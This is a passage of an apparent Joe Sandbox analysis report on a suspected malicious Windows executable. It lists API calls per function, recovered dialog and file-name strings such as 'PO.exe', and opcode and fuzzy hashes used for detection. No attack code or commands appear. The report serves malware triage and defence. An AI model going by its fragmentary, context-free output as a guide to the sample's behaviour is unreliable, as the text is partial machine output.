                        • _free.LIBCMT ref: 00C8A2B6
                          • Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
                          • Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826
                        • _free.LIBCMT ref: 00C8A2C8
                        • _free.LIBCMT ref: 00C8A2DB
                        • _free.LIBCMT ref: 00C8A2EC
                        • _free.LIBCMT ref: 00C8A2FD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 586c07660711560fa90b4f460e958a927394552497e4efd7a63450f799e2af55
                        • Instruction ID: 939b3246c99872ab83b7282ed14a26c81ead0f6c69e83a7c8dd0b49d11759856
                        • Opcode Fuzzy Hash: 586c07660711560fa90b4f460e958a927394552497e4efd7a63450f799e2af55
                        • Instruction Fuzzy Hash: D2F05470913110BFAB11BFA8BD9174D37B1FB4872834D011BF81597271EB350A81EB86
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\owKQ0b029a.exe,00000104), ref: 00C89973
                        • _free.LIBCMT ref: 00C89A3E
                        • _free.LIBCMT ref: 00C89A48
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\Desktop\owKQ0b029a.exe
                        • API String ID: 2506810119-2882507503
                        • Opcode ID: 774bec4fac931223a0ebd995e2693113284428f117020d38b0f08e5467158623
                        • Instruction ID: 1e667adcd31a762b71b147ebf624be3318d5b546f292eba2dba04bf2555621ea
                        • Opcode Fuzzy Hash: 774bec4fac931223a0ebd995e2693113284428f117020d38b0f08e5467158623
                        • Instruction Fuzzy Hash: 67318E71A05218BFDB25FB99DC81AAEBBFCEB85318F18406BE80497210D7704E40EB55
                        APIs
                        • CharUpperW.USER32(?,?,?,?,00001000), ref: 00C7F7F0
                        • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00C7F817
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CharUpper
                        • String ID: -
                        • API String ID: 9403516-2547889144
                        • Opcode ID: 5fa25267a89257ff8f2ac3b5536ae9f034a878bd75b4ad07a81979d4fe42f5bc
                        • Instruction ID: 345f44cb1772eadf2be41c32de281d0a8fa6f78bce3cdc9371f9936cba255290
                        • Opcode Fuzzy Hash: 5fa25267a89257ff8f2ac3b5536ae9f034a878bd75b4ad07a81979d4fe42f5bc
                        • Instruction Fuzzy Hash: 5E21E57240830555D325DB798889B7F6FA89782314F00C83FF5ACD20D1DAB4CA86D273
                        APIs
                          • Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
                          • Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA
                        • EndDialog.USER32(?,00000001), ref: 00C7E558
                        • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 00C7E570
                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00C7E59E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ItemText$DialogWindow
                        • String ID: GETPASSWORD1
                        • API String ID: 445417207-3292211884
                        • Opcode ID: 3cfa011a8a06447b2252d4e37f0dd5e2eb4db2a2d26f6d8e460f25771b4794c9
                        • Instruction ID: abd6584d9a6e480afa293be0bd01e43fb733e64f25ed8cfd4e50fae8fe09a5aa
                        • Opcode Fuzzy Hash: 3cfa011a8a06447b2252d4e37f0dd5e2eb4db2a2d26f6d8e460f25771b4794c9
                        • Instruction Fuzzy Hash: 0B11A13390012C7ADB219AA99D4DFFE3B6CEB4D754F0480A5FA8DE6080E661DE019761
                        APIs
                        • _swprintf.LIBCMT ref: 00C731C7
                          • Part of subcall function 00C736D0: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C736E3
                        • _wcschr.LIBVCRUNTIME ref: 00C731E5
                        • _wcschr.LIBVCRUNTIME ref: 00C731F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                        • String ID: %c:\
                        • API String ID: 525462905-3142399695
                        • Opcode ID: 322061f544366dbc8ac07f06b5b1150fd8a006fd45c4f3098f1d4390f98b8cb7
                        • Instruction ID: f7c07763c897fa3deac595f379cc2db3ef74c83621a2d49817dc06031a211196
                        • Opcode Fuzzy Hash: 322061f544366dbc8ac07f06b5b1150fd8a006fd45c4f3098f1d4390f98b8cb7
                        • Instruction Fuzzy Hash: 3401F5235047527A9A21773A9C46C6BA7ACEF86770750C41AF858C2083EA20DA50A2B6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID: RENAMEDLG$REPLACEFILEDLG
                        • API String ID: 0-56093855
                        • Opcode ID: cfe6fb1398566d5a00fe3fb10ae7f20536a2e80a34256892e6cb98b9721f1900
                        • Instruction ID: 0f9961491203707fd634351c108b6441a887f6802623aa908c1e16ac6741e1ef
                        • Opcode Fuzzy Hash: cfe6fb1398566d5a00fe3fb10ae7f20536a2e80a34256892e6cb98b9721f1900
                        • Instruction Fuzzy Hash: 3801D471504201AFCB50EB99EC80B2EBBDCE745399F21053AF452E2230D632AC6CDB65
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 00C73CCB
                        • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00C73CDA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: FindHandleModuleResource
                        • String ID: LTR$RTL
                        • API String ID: 3537982541-719208805
                        • Opcode ID: 601591e050132657465adcd0194e66343a0c3fe74ce681237062a16a2356bed9
                        • Instruction ID: 930890d429540414344695a33dbc4928376344b3f25fa034d68fd629395241ce
                        • Opcode Fuzzy Hash: 601591e050132657465adcd0194e66343a0c3fe74ce681237062a16a2356bed9
                        • Instruction Fuzzy Hash: 1AF059B160479427EB3466B56C0EFAB3BACE781B00F18036EB649970C0CFE1990D87E0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        • Opcode ID: 82a8409b50e41e7ff812f2450216d1d41601efd86ff278fd51673b24b6a99672
                        • Instruction ID: 706291a6d42a1143ef535e84398c76608520d910e98671b1e91f0efa6e4d0ce9
                        • Opcode Fuzzy Hash: 82a8409b50e41e7ff812f2450216d1d41601efd86ff278fd51673b24b6a99672
                        • Instruction Fuzzy Hash: DCA1AB729003869FDB25EF18C8927BEBFE0EF55318F18416DE4A59B282D7349E42C758
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _strncpy$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 2527496121-0
                        • Opcode ID: 994048f68708b5d620a132504b66fe5f0281a51429ce80cd3a1890d6ebe66079
                        • Instruction ID: 2be9075ba9026b85ba5725d963461d28fb4a95cbe3e75628206a1aa882ae5220
                        • Opcode Fuzzy Hash: 994048f68708b5d620a132504b66fe5f0281a51429ce80cd3a1890d6ebe66079
                        • Instruction Fuzzy Hash: B6A178B1509301DBC724DF69EC85B2E7BEAFBC8314F148B2AF91993261D7709D049B92
                        APIs
                        • __allrem.LIBCMT ref: 00C7B9F3
                        • _memcmp.LIBVCRUNTIME ref: 00C7BA97
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C7BB1B
                        • _memcmp.LIBVCRUNTIME ref: 00C7BBB6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _memcmp$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 3520290970-0
                        • Opcode ID: 18033d9df1f2ce1e2e17572a538c4dcdb2137b597f52555b49588b534ae7ca56
                        • Instruction ID: 541f962c37b37b1de2c823395da900cd496bb63713526a5e3df0cbae709a1675
                        • Opcode Fuzzy Hash: 18033d9df1f2ce1e2e17572a538c4dcdb2137b597f52555b49588b534ae7ca56
                        • Instruction Fuzzy Hash: CA6177B1608205DFD728DF29EC85B2A7BA5FBC4724F148329FD19D72A1E730AD408B52
                        APIs
                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00C725CA
                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800), ref: 00C7260E
                        • SetFileTime.KERNEL32(?,?,?,00000000), ref: 00C7268F
                        • CloseHandle.KERNEL32(?), ref: 00C72696
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: File$Create$CloseHandleTime
                        • String ID:
                        • API String ID: 2287278272-0
                        • Opcode ID: 18729a9587202e3be4203240e2eccc3ad20212984de88a2757f6ac45c0f856d2
                        • Instruction ID: db187ad7eabd4eb629195200765292dc1dc7aaacbaded25e8f1063b9155eb34f
                        • Opcode Fuzzy Hash: 18729a9587202e3be4203240e2eccc3ad20212984de88a2757f6ac45c0f856d2
                        • Instruction Fuzzy Hash: 2341F030248381AAE721DF24CC55FEEBBE8AF84700F04891EF9E8D7191C674DB089B52
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,91E85006,00C873FC,00000000,00000000,00C87C2A,?,00C87C2A,?,00000001,00C873FC,91E85006,00000001,00C87C2A,00C87C2A), ref: 00C8E22E
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C8E2B7
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C8E2C9
                        • __freea.LIBCMT ref: 00C8E2D2
                          • Part of subcall function 00C8A838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                        • String ID:
                        • API String ID: 2652629310-0
                        • Opcode ID: cba1a6b675270e3e3bf36dc614d24f0323c1236c8bfb95f3281b4b8ba72ec4bb
                        • Instruction ID: ca8ba6ac26301f66820f8fa39c2b69a6e84936b68fad8a9b47cbc32d99b3ddd5
                        • Opcode Fuzzy Hash: cba1a6b675270e3e3bf36dc614d24f0323c1236c8bfb95f3281b4b8ba72ec4bb
                        • Instruction Fuzzy Hash: 3D31F232A0020AABDF25EF65DC85EAE7BA9EF40315F140229FC14D7190E735DE51DBA4
                        APIs
                        • LoadBitmapW.USER32(00000065), ref: 00C7E94A
                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00C7E96B
                        • DeleteObject.GDI32(00000000), ref: 00C7E993
                        • DeleteObject.GDI32(00000000), ref: 00C7E9B2
                          • Part of subcall function 00C7DB06: FindResourceW.KERNEL32(00000066,PNG,?,?,00C7E98C,00000066), ref: 00C7DB17
                          • Part of subcall function 00C7DB06: SizeofResource.KERNEL32(00000000,75FD5780,?,?,00C7E98C,00000066), ref: 00C7DB2F
                          • Part of subcall function 00C7DB06: LoadResource.KERNEL32(00000000,?,?,00C7E98C,00000066), ref: 00C7DB42
                          • Part of subcall function 00C7DB06: LockResource.KERNEL32(00000000,?,?,00C7E98C,00000066), ref: 00C7DB4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                        • String ID:
                        • API String ID: 142272564-0
                        • Opcode ID: ef3d10181b4018f0950e003f5c14ca26a7e0dd4cefbe39a6ba9cbd69dae8e89a
                        • Instruction ID: 006027c8e4efd13121d635973f362a623cf65cc38b895491707b0418a35f21b1
                        • Opcode Fuzzy Hash: ef3d10181b4018f0950e003f5c14ca26a7e0dd4cefbe39a6ba9cbd69dae8e89a
                        • Instruction Fuzzy Hash: 5A012B3364020577CA1133788C46FBF7B7DAF89B51F094165FA09E7191DE11CC15A1A1
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00C85D71
                          • Part of subcall function 00C863A9: ___AdjustPointer.LIBCMT ref: 00C863F3
                        • _UnwindNestedFrames.LIBCMT ref: 00C85D88
                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00C85D9A
                        • CallCatchBlock.LIBVCRUNTIME ref: 00C85DBE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                        • String ID:
                        • API String ID: 2633735394-0
                        • Opcode ID: 6fa91e04da766b24e34099e515c0a701b44e936f18e28dadd3d333c7dad21dd7
                        • Instruction ID: 272538c39884b81f5979548339893141c1a83a3a09a41b391e17cd04f97ef5b9
                        • Opcode Fuzzy Hash: 6fa91e04da766b24e34099e515c0a701b44e936f18e28dadd3d333c7dad21dd7
                        • Instruction Fuzzy Hash: 43012532000908BFCF126F55CD09EDA3BBAEF98719F148115FE1866120C372E861EBA8
                        APIs
                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00C85684
                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00C85689
                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00C8568E
                          • Part of subcall function 00C867FE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00C8680F
                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00C856A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                        • String ID:
                        • API String ID: 1761009282-0
                        • Opcode ID: 216b7c590bb4bcc37f223e8d58ee93ca824c24aa177a21f58ee32619cf1884c0
                        • Instruction ID: c552a6ea6a4ec971f15dc254d7f71c8f776554f810cb3f7b1ef0868673d99c98
                        • Opcode Fuzzy Hash: 216b7c590bb4bcc37f223e8d58ee93ca824c24aa177a21f58ee32619cf1884c0
                        • Instruction Fuzzy Hash: 2CC048A8000A42A09C143AB162025AD27810E667DCBD054E5F96127603BECA190BBB7F
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID: PO.exe
                        • API String ID: 2931989736-3005272355
                        • Opcode ID: daafdb3c1e818e7baafa040ecce523f7cc3ba39818c2c992af30121184ee8d05
                        • Instruction ID: f79fa5adaa253ee2887cbc08e1778f6494f0d90706989b2341bd770b391d7587
                        • Opcode Fuzzy Hash: daafdb3c1e818e7baafa040ecce523f7cc3ba39818c2c992af30121184ee8d05
                        • Instruction Fuzzy Hash: E3A11671508281DBD321DB64DC81BAE77A9BB85304F08C72EF99DC3262DB708D49DB52
                        APIs
                          • Part of subcall function 00C7DADB: GetDC.USER32(00000000), ref: 00C7DADF
                          • Part of subcall function 00C7DADB: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C7DAEA
                          • Part of subcall function 00C7DADB: ReleaseDC.USER32(00000000,00000000), ref: 00C7DAF5
                        • GetObjectW.GDI32(?,00000018,?), ref: 00C7DC5A
                          • Part of subcall function 00C7DE20: GetDC.USER32(00000000), ref: 00C7DE29
                          • Part of subcall function 00C7DE20: GetObjectW.GDI32(?,00000018,?), ref: 00C7DE58
                          • Part of subcall function 00C7DE20: ReleaseDC.USER32(00000000,?), ref: 00C7DEEC
                        Strings
                        Memory Dump Source
